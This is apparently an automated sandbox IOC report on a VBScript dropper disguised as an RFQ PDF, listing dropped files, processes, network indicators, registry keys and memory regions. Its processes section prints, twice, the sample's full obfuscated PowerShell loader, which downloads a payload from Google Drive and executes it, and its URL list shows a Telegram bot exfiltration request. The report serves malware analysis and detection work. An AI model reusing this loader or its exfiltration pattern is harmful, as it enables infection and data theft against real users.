IOC Report
RFQ_64182MR_PDF.R00.vbs

loading gif

Files

File Path
Type
Category
Malicious
RFQ_64182MR_PDF.R00.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_goiohz1b.t1i.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sv4wb10k.s1y.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtxz2zbu.yqo.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ygdzfstk.l3d.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Platyhelminthic195.End
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_64182MR_PDF.R00.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios .tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios .tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://nuget.org/NuGet.exe
unknown
http://drive.usercontent.google.com
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.googP
unknown
https://reallyfreegeoip.org/xml/173.254.250.71
188.114.97.3
https://drive.usercontent.googh
unknown
http://drive.google.com
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
unknown
https://github.com/Pester/Pester
unknown
https://www.google.com
unknown
http://checkip.dyndns.org/
193.122.6.168
https://aka.ms/pscore6lB
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2024/10/2024%20/%2017:25:47%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://drive.google.com
unknown
https://drive.usercontent.google.com
unknown
https://aka.ms/pscore68
unknown
https://apis.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
There are 15 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
reallyfreegeoip.org
188.114.97.3
malicious
api.telegram.org
149.154.167.220
malicious
checkip.dyndns.org
unknown
malicious
drive.google.com
142.250.185.78
drive.usercontent.google.com
142.250.185.65
checkip.dyndns.com
193.122.6.168

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
188.114.97.3
reallyfreegeoip.org
European Union
malicious
142.250.185.78
drive.google.com
United States
193.122.6.168
checkip.dyndns.com
United States
216.58.206.78
unknown
United States
142.250.185.65
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileDirectory
There are 19 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
242C1000
trusted library allocation
page read and write
malicious
B0D5000
direct allocation
page execute and read and write
malicious
8800000
direct allocation
page execute and read and write
malicious
26815481000
trusted library allocation
page read and write
malicious
59A6000
trusted library allocation
page read and write
malicious
24C118B3000
heap
page read and write
2678D000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
264A2000
trusted library allocation
page read and write
24C117B8000
heap
page read and write
26A10000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
427000
trusted library allocation
page execute and read and write
269F0000
trusted library allocation
page read and write
2680686E000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
26803950000
trusted library allocation
page read and write
268058BD000
trusted library allocation
page read and write
2EC0000
trusted library section
page read and write
26A10000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
6EC0000
direct allocation
page read and write
26803940000
heap
page read and write
2CCD000
heap
page read and write
26A10000
trusted library allocation
page read and write
6E80000
direct allocation
page read and write
26A10000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
244A7000
trusted library allocation
page read and write
27210000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
271C0000
trusted library allocation
page read and write
2681D7FE000
heap
page read and write
B5CC0FD000
stack
page read and write
24C117CE000
heap
page read and write
269F0000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
24C11DD1000
heap
page read and write
271C0000
trusted library allocation
page read and write
869C000
stack
page read and write
5931000
trusted library allocation
page read and write
2479F000
trusted library allocation
page read and write
241DE000
stack
page read and write
26A10000
trusted library allocation
page read and write
27140000
trusted library allocation
page read and write
8820000
direct allocation
page read and write
26530000
trusted library allocation
page read and write
26805230000
trusted library allocation
page read and write
27140000
trusted library allocation
page execute and read and write
2642E000
heap
page read and write
47FC000
stack
page read and write
253E5000
trusted library allocation
page read and write
2F30000
trusted library allocation
page read and write
24C0F83E000
heap
page read and write
24C0F826000
heap
page read and write
26A10000
trusted library allocation
page read and write
24C117B0000
heap
page read and write
61E000
heap
page read and write
24C0F85C000
heap
page read and write
26770000
trusted library allocation
page read and write
264C0000
trusted library allocation
page read and write
24C0F7B7000
heap
page read and write
87F0000
trusted library allocation
page read and write
2539B000
trusted library allocation
page read and write
5D2000
heap
page read and write
24C119C4000
heap
page read and write
269F0000
trusted library allocation
page read and write
24C117C3000
heap
page read and write
865C000
stack
page read and write
26530000
trusted library allocation
page read and write
263FB000
heap
page read and write
2C90000
heap
page read and write
27110000
trusted library allocation
page read and write
2708E000
stack
page read and write
24450000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
82B8000
heap
page read and write
26806331000
trusted library allocation
page read and write
8269000
heap
page read and write
26A10000
trusted library allocation
page read and write
271C0000
trusted library allocation
page read and write
818E000
stack
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
24C0F780000
heap
page read and write
2681D7A0000
heap
page read and write
7431000
heap
page read and write
255DC000
trusted library allocation
page read and write
A97000
stack
page read and write
75AE000
stack
page read and write
2553B000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
2F10000
trusted library allocation
page read and write
271F0000
trusted library allocation
page read and write
24C11DD0000
heap
page read and write
26A10000
trusted library allocation
page read and write
246E6000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
876E000
stack
page read and write
26780000
trusted library allocation
page read and write
2681D8D7000
heap
page execute and read and write
2640B000
heap
page read and write
253A7000
trusted library allocation
page read and write
B00000
heap
page read and write
23F3F000
stack
page read and write
2540C000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
24C0F8AA000
heap
page read and write
27210000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
B5CBDFF000
stack
page read and write
2EF9000
trusted library allocation
page read and write
B9F000
stack
page read and write
B5CB8FA000
stack
page read and write
2D41000
heap
page read and write
560000
heap
page read and write
271C0000
trusted library allocation
page read and write
244D1000
trusted library allocation
page read and write
271F0000
trusted library allocation
page read and write
24C11699000
